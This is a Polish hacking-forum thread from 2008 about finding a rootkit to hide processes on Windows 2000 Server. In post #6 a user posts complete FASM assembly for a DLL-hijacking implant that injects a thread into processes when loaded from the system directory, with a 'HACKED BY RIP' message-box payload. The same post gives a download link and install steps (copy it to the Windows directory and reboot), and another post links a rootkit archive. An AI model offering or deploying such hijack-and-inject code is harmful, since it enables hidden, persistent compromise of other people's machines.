Pokaż wyniki 1 do 10 z 10

Temat: rootkit windows serwer 2000

  1. #1
    Avatar michalski007
    michalski007 jest offline michalski
    Zarejestrowany
    Sep 2006
    Skąd
    Warszawa
    Postów
    137

    Domyślnie rootkit windows serwer 2000

    witam , poszukuję rootkita który umożliwi ukrycie dowolnego procesu w w maszynie pod kontrolą windows 2000 server. Po przeszukaniu internetu , nie trafiłem na nic co warte było by uwagi. Może ktoś z was ma coś do zaoferowania? Może jakies źródła?

    pozdrawiam

  2. #2
    rip
    rip jest offline Banned
    Zarejestrowany
    May 2008
    Postów
    534

    Domyślnie

    a nie lepiej dll spoof?
    po co tworzyc nowy proces?

  3. #3
    Avatar michalski007
    michalski007 jest offline michalski
    Zarejestrowany
    Sep 2006
    Skąd
    Warszawa
    Postów
    137

    Domyślnie re:

    rip, mógłbyś nieco rozjaśnić co to dll spoof , albo podać jakie materiały objaśniające to zagadnienie?

  4. #4
    rip
    rip jest offline Banned
    Zarejestrowany
    May 2008
    Postów
    534

    Domyślnie

    - Asembler
    - Budowa dll
    - Kolejka ladowania dll przez procesy
    - mechanizm dllow i watkow

    W necie nie znajdziesz wiele informacji na ten temat, chodzi tu o napisanie swojej dllki, w momencie zaladowanie wrzucenie watku w proces. Moj ulubiony sposob, gdyz calosc ogranicza sie tylko to stworzenia 1 pliku, zadnego uruchamiania, autostart praktycznie nie do wykrycia no i zadnych procesow. To jest jepsze niz jakies SSDT hooki czy inne wymyslne metody. Prostota implementacji i skutecznosc dzialania tworzy z tego najdoskonalszy rootkit. Powiem ci nawet ze to jedna z niewielu rzeczy jakich sie obawiam uruchamiajac zacryptowane pliki

  5. #5
    Zarejestrowany
    Sep 2006
    Postów
    1,227

    Domyślnie

    Typowe. Wymienicie techniki/jezyki programowania i od razu super-extra hakerzy... Sorry rip, to nic personalnego, po prostu na Ciebie padło a tyczy się 90% forumowiczów.

    Skrypt + opis
    http://dn.codegear.com/article/10396
    Powinno Ci nakreślić, o co chodzi w ukrywaniu procesów.

  6. #6
    rip
    rip jest offline Banned
    Zarejestrowany
    May 2008
    Postów
    534

    Domyślnie

    masz racje, lepiej dac jakis kod w cpp z ktorego nic nie da sie zrozumiec.

    pozwole sobie zacytowac 1 z komentarzy:
    This code works great, but who uses Windows 95/98? Is there a method for doing this with 2000/XP?

    a tu sposob na 2k i wyzej. Mozecie 'podmienic' kazda biblioteke, o ile kolejka na to pozwala.
    Kod:
    format pe dll
    section '' readable
    entry $
    cmp dword [esp+8],1
    jnz exit
    xor eax,eax
    push a
    push eax
    push eax
    call [CreateMutexA]
    test eax,eax
    jz exit
    call [GetLastError]
    cmp eax,0xB7
    jz exit
    xor eax,eax
    push eax
    push eax
    push eax
    push x
    push eax
    push eax
    call [CreateThread]
    exit:
    xor eax,eax
    inc eax
    retn 12
    x:
    xor ebx,ebx
    xx:
    push ebx
    push ebx
    push a
    push ebx
    call [MessageBoxA]
    jmp xx
    a db 'HACKED BY RIP',0
    section '' import readable
    dd 0,0,0,RVA kernel32_name,RVA kernel32_table
    dd 0,0,0,RVA user32_name,RVA user32_table
    dd 0,0,0,0,0
    kernel32_table:
    CreateThread dd RVA _CreateThread
    CreateMutexA dd RVA _CreateMutexA
    GetLastError dd RVA _GetLastError
    dd 0
    user32_table:
    MessageBoxA dd RVA _MessageBoxA
    dd 0
    kernel32_name db 'kernel32.dll',0
    user32_name db 'user32.dll'
    _CreateThread db 0,0,'CreateThread'
    _CreateMutexA db 0,0,'CreateMutexA'
    _GetLastError db 0,0,'GetLastError'
    _MessageBoxA db 0,0,'MessageBoxA',0
    section '' fixups
    moglbym troche zoptymalizowac, ale wtedy niebylo by niewykrywalne.


    http://www.sendspace.com/file/308a4j
    wrzuc do %homedrive%\windows, i uruchom ponownie system.
    Ostatnio edytowane przez rip : 05-29-2008 - 12:06

  7. #7
    Avatar michalski007
    michalski007 jest offline michalski
    Zarejestrowany
    Sep 2006
    Skąd
    Warszawa
    Postów
    137

    Domyślnie

    dziękuje panom za pomoc. ripie w moim przypadku tak biblioteka niestety nie funkcjonuje
    ja znalazłem wczoraj jednego, jest dość ciekawy, przeznaczony do NT i 2000, podaje link,może komuś się przyda

    www.interka.pl/~zielak/root.rar

    H: NASA

  8. #8
    rip
    rip jest offline Banned
    Zarejestrowany
    May 2008
    Postów
    534

    Domyślnie

    troche dziwna sprawa ze nie dziala.
    jak bys chcial jednak dojsc czemu nie dziala, uruchom proces explorer, ctrl+l i skopiuj wszystkie dllki z ktorych kozysta explorer.exe wraz ze sciezkami.


    A moze nie masz katalogu windows? afair pod 2k jest \winNT, chodzilo mi o %systemroot%, nie o tworzenie nowego katalogi




    a twoj rootkit:

    jak uwazasz ze to ci wystarczy no to coz... powodzenia

  9. #9
    Avatar gogulas
    gogulas jest offline killboy powerhead
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie

    a moze odpal jako usluge? nie bedzie procesu widac..

    Taka wykrywalnosc... to co zostalo z definicji rootkita?

    czy odpalanie progsow od h3x'a nie grozi trwalym kalectwem systemu operacyjnego?
    http://gogulas.yoyo.pl/h.gif

  10. #10
    Zarejestrowany
    Feb 2008
    Postów
    44

    Domyślnie

    Taki mały offtop. Uważam, że 90% forumowiczów ma rację nie podając tylko kodów. Najlepiej naprowadzić na temat. Bo jak ktoś sam poszuka sobie informacji, poznajduje jakieś artykuły lepiej się nauczy. A jak nie, to znaczy, że nie było mu potrzebne, nie chciał tego umieć.
    Chociaż kawałek kodu też nie zaszkodzi. Ale ten asm podejrzewam, że i tak większość nie zrozumie.
    Nasuwa się pytania, co oni tu robią?! To jest forum dla programistów, albo ludzi co potrzebują ich OPINII! Nie gotowców. Żaden informatyk (który z natury powinien być w tym temacie ambitny) nie będzie dążył do podawania mu gotowców na chama!

Podobne wątki

  1. rootkit (gotowiec)
    By h3x in forum Wirusy/Konie trojańskie
    Odpowiedzi: 0
    Autor: 04-20-2008, 20:07
  2. Ograniczenie Dostępu Windows 2000
    By maciek_ in forum Newbie - dla początkujących!
    Odpowiedzi: 26
    Autor: 02-28-2008, 21:23
  3. Haslo do Win 2000
    By skie in forum Newbie - dla początkujących!
    Odpowiedzi: 2
    Autor: 01-07-2008, 08:04
  4. Anarhistyczna książk kucharska 2000
    By Sardihan in forum Off Topic
    Odpowiedzi: 3
    Autor: 05-23-2007, 15:37

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj